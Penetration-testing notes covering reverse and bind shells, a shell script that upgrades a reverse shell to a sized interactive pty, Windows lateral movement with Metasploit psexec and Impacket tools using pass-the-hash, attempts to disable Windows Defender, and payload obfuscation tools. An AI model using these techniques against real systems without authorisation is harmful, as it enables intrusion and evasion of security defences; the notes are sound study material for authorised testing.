Shells
Reverse Shell
We start a listener on our machine and trigger a connection from the target machine back to us.
Useful when the target can reach out to us but we cannot reach in: internal engagements, or external ones where we control the firewall in front of our listener and can open the port it listens on.
Sometimes they don't work, most often because the target's outbound traffic is filtered. Before blaming the payload, retry on a port the target is likely allowed to reach (443 or 53, for example).
Bind Shell
The opposite of a reverse shell: the target listens and we connect to it.
Useful if we are able to open a port on the target's firewall (or one is already allowed inbound). The listening port shows up in netstat/ss on the target, so it is noisier than a callback.
Making our shell more friendly
Usually a reverse shell will not be very friendly: no prompt, no autocomplete, clear doesn't work, sometimes the echo is weird, and Ctrl+C kills the whole connection. There are a few ways to fix this:
If Python is available on the machine, we can spawn a pty shell:
python -c 'import pty; pty.spawn("/bin/bash")'
After doing this, there are a few quality-of-life changes you can make:
Background the shell with ctrl+z, then on your own terminal run:
stty raw -echo
fg [enter] [enter]
This brings you back into the shell with tab completion, arrow keys and Ctrl+C working. When the shell later dies, your local terminal is still in raw mode: type reset (you won't see it echoed) to restore it.
export TERM=xterm
Also size the pty to match your own terminal, otherwise vi and less render badly: run stty size on your machine, then stty rows N columns M inside the shell.
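The upgrade steps above, collected into one helper you run on the attacker box before pressing ctrl+z. This is an added example, not from the original notes: it reads the local terminal size, validates it, and prints the exact lines to paste into the reverse shell, falling back from python3 to python to util-linux script when the target lacks one of them. The function name upgrade_cmds and the default TERM of xterm are my choices.

```shell
#!/bin/sh
# Added example (not part of the original notes): print the paste-in sequence
# that upgrades a dumb reverse shell to a sized, interactive pty.
# Assumptions: run on the attacker side under a POSIX shell; the target is
# Linux with python3, python2 or util-linux `script` available.

# upgrade_cmds "ROWS COLS" [TERM]
#   ROWS COLS is the output of `stty size` on the attacker's terminal.
#   Prints, in order: the pty spawn (with fallbacks), the TERM export, and the
#   stty line that makes the target pty the same size as the local terminal.
upgrade_cmds() {
  term="${2:-xterm}"
  # split "ROWS COLS" on whitespace into $1 and $2
  set -- $1
  rows="$1"
  cols="$2"
  # refuse anything that is not two decimal numbers, so we never emit
  # "stty rows  columns " and leave the target pty in a broken state
  case "${rows}x${cols}" in
    *[!0-9x]*|x*|*x)
      echo "upgrade_cmds: expected 'ROWS COLS' from stty size, got '$rows $cols'" >&2
      return 1 ;;
  esac
  # Line 1: spawn a pty. Each alternative is only tried if the previous one is
  # missing (exit 127 from "command not found" is swallowed by ||).
  printf '%s\n' \
    "python3 -c 'import pty; pty.spawn(\"/bin/bash\")' 2>/dev/null || python -c 'import pty; pty.spawn(\"/bin/bash\")' 2>/dev/null || script -qc /bin/bash /dev/null" \
    "export TERM=$term" \
    "stty rows $rows columns $cols"
}

# Stand-alone use: with a real terminal attached, print the commands for it.
# Then press ctrl+z in the reverse shell, run `stty raw -echo; fg` locally,
# and paste the printed lines. Run `reset` locally once the shell is gone.
if [ -t 0 ]; then
  upgrade_cmds "$(stty size)" "${TERM:-xterm}"
fi
```

The validation matters more than it looks: stty size prints nothing useful when the attacker shell has no tty (for example inside some tmux/screen or CI contexts), and blindly pasting "stty rows  columns" into the target leaves the pty misconfigured with no obvious error.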
If you find that python is not on the machine, you can still get a shell that's a little better:
Windows
Many times on Windows, the AV will block these attempts; we can try to disable it with the following in PowerShell:
Metasploit
We can use the psexec module in Metasploit (exploit/windows/smb/psexec) and provide a username and password, or a username and NTLM hash (pass-the-hash).
When using this module, set your payload appropriately; it must match the target's architecture.
For this instance we used windows/x64/meterpreter/reverse_tcp.
psexec.py (Impacket)
This tool is a bit quieter than the Metasploit module and harder to detect, but it still uploads a randomly named service binary to the ADMIN$ share and registers a service, which is exactly what most AV/EDR looks for.
Hashes can be used as well with the
-hashes LMHASH:NTHASH flag (the LM half may be left empty, e.g. -hashes :NTHASH)
wmiexec.py
Uses the same syntax as psexec.py, but executes commands over WMI and does not drop a binary on disk; command output is read back over the ADMIN$ share. Of the three it leaves the smallest footprint.
smbexec.py
Uses the same syntax as psexec.py. Instead of uploading a binary it creates a temporary service for each command and reads the output back from a file on an SMB share, so it is noisy in the service and event logs.
IN ALL OF MY ATTEMPTS WITH WINDOWS 11 ALL OF THESE ATTEMPTS WERE CAUGHT.
Even using a Group Policy to turn off Windows Defender Antivirus, disabling Tamper mode, restarting the machines, Windows Defender came back on after some time and caught the attempts.
Payloads
msfvenom is a great tool for building payloads
darkarmour is also great for building payloads and obfuscating them: https://github.com/bats3c/darkarmour
Many prebuilt payloads can be found at the following repositories: